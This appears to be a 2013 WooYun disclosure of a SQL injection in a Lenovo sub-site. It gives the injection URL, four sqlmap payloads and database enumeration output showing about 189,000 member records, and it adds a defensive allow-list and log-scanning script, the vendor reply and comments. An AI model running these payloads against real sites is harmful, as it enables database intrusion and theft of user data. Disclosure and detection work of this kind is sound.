
Vulnerability Summary

Defect ID: wooyun-2013-036396

Title: Lenovo security issue #13: SQL injection in a certain sub-site (189738 user records)

Vendor: Lenovo

Author: VIP

Submitted: 2013-09-08 11:50

Fixed: 2013-10-23 11:51

Published: 2013-10-23 11:51

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor has confirmed

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2013-09-08: Details reported to the vendor, awaiting vendor response
2013-09-09: Vendor has confirmed; details disclosed to the vendor only
2013-09-19: Details disclosed to core white hats and relevant domain experts
2013-09-29: Details disclosed to regular white hats
2013-10-09: Details disclosed to intern white hats
2013-10-23: Details disclosed to the public

Brief description:

Lenovo's gift arrived, and it is far, far more generous than what most other vendors send (it included a Samsung 120G SSD).

Detailed description:

Injection point:
http://ideaclub.lenovo.com.cn/club/index.php?m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b

Proof of vulnerability:

---
Place: GET
Parameter: item_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b' AND 3075=3075 AND 'HSHZ'='HSHZ

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b' AND (SELECT 1518 FROM(SELECT COUNT(*),CONCAT(0x7176717471,(SELECT (CASE WHEN (1518=1518) THEN 1 ELSE 0 END)),0x7164647071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WOvh'='WOvh

Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717471,0x6155685674576d7a6b6a,0x7164647071),NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b' AND SLEEP(5) AND 'REay'='REay
---


web application technology: Nginx
back-end DBMS: MySQL 5.0


available databases [4]:
[*] erazer
[*] ideaclub
[*] ideaclub2
[*] information_schema


current user:    'ideaclub@localhost'


current database:    'ideaclub2'


Database: ideaclub2
[345 tables]


Database: ideaclub2
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| f_common_member | 189738 |
+-----------------+---------+

Fix:

Filter the input.

Copyright notice: when reposting, credit the source as VIP@WooYun
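As an added illustration of that fix (not code from the original report or from the site), the block below does two defender-side things: an allow-list check that accepts only the 32-character hex shape item_id has in the report, and a scan of Nginx access-log lines that flags the four sqlmap techniques listed in the proof section. The id shape, the signatures and the log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# item_id in the report is a 32-char lowercase hex string; an allow-list check on
# that exact shape is the "filter" the fix asks for (assumed shape; the app's real rule is unknown).
ITEM_ID_RE = re.compile(r"\A[0-9a-f]{32}\Z")

# One signature per sqlmap technique listed in the report's proof section.
INJECTION_MARKERS = [
    ("boolean-based blind", re.compile(r"'\s*AND\s+\d+=\d+\s+AND\s+'", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("UNION query", re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I)),
    ("time-based blind", re.compile(r"SLEEP\s*\(\s*\d+\s*\)", re.I)),
]
REQ_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')  # request line in the log

def valid_item_id(value):
    """True only for a bare 32-hex id; anything appended (quote, AND, ...) fails."""
    return ITEM_ID_RE.match(value) is not None

def classify_request(url):
    """Techniques seen in item_id; [] when every item_id value is well formed."""
    findings = []
    # parse_qs percent-decodes values, so the signatures see the decoded payload.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for value in query.get("item_id", []):
        if valid_item_id(value):
            continue
        hits = [name for name, rx in INJECTION_MARKERS if rx.search(value)]
        findings.extend(hits or ["malformed item_id"])
    return findings

def scan_access_log(lines):
    """[(line_number, techniques)] for every request carrying a bad item_id."""
    flagged = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m and (found := classify_request(m.group(1))):
            flagged.append((n, found))
    return flagged

# Constructed Nginx access-log sample: one clean request, then the boolean,
# time-based and UNION payloads from the report, URL-encoded as a client sends them.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Sep/2013:11:40:01 +0800] "GET /club/index.php?m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b HTTP/1.1" 200 512
203.0.113.5 - - [08/Sep/2013:11:40:02 +0800] "GET /club/index.php?m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b%27%20AND%203075%3D3075%20AND%20%27HSHZ%27%3D%27HSHZ HTTP/1.1" 200 512
203.0.113.5 - - [08/Sep/2013:11:40:03 +0800] "GET /club/index.php?m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b%27%20AND%20SLEEP(5)%20AND%20%27REay%27%3D%27REay HTTP/1.1" 200 512
203.0.113.5 - - [08/Sep/2013:11:40:04 +0800] "GET /club/index.php?m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717471,0x61,0x7164647071),NULL,NULL,NULL%23 HTTP/1.1" 200 512
"""
```

Running scan_access_log(SAMPLE_LOG.splitlines()) flags lines 2, 3 and 4 with one technique each; the allow-list check alone is what stops the query from ever being built, the log scan only tells you it was tried.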


Vulnerability Response

Vendor response:

Severity: Low

Rank: 5

Confirmed: 2013-09-09 17:17

Vendor reply:

This seems to be a duplicate of the one you submitted earlier: http://www.wooyun.org/bugs/wooyun-2013-035312.

Latest status:

None yet



Comments

  1. 2013-09-08 20:45 | PgHook ( Regular white hat | Rank:964 Bugs:115 | ...........................................)

    You're tempting us with this!!!!!!

  2. 2013-09-09 12:28 | Lee Swagger ( Passer-by | Rank:28 Bugs:5 | Go wash up and get some sleep)

    @VIP Besides the SSD, what else was there?

  3. 2013-10-20 13:47 | 沦沦 ( Regular white hat | Rank:504 Bugs:127 | Love my wife, love life)

    Looking to team up, looking to exchange notes